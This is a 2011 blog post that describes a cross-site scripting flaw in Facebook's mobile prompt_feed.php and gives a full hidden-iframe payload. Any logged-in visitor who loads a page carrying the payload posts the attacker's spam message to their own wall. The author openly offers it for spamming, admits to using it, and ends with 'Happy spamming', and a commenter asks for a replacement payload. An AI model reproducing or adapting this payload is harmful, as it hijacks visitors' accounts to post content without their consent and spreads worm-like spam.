March 28, 2011
Autopost Spamming using Facebook Mobile XSS
Posted by: Joy : Category: Facebook Tips, Vulnerability
What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection.
Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :
<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
That’s all. Happy spamming 
June 1st, 2011 at 5:24 am
yes this code is not working any more. waiting for a new one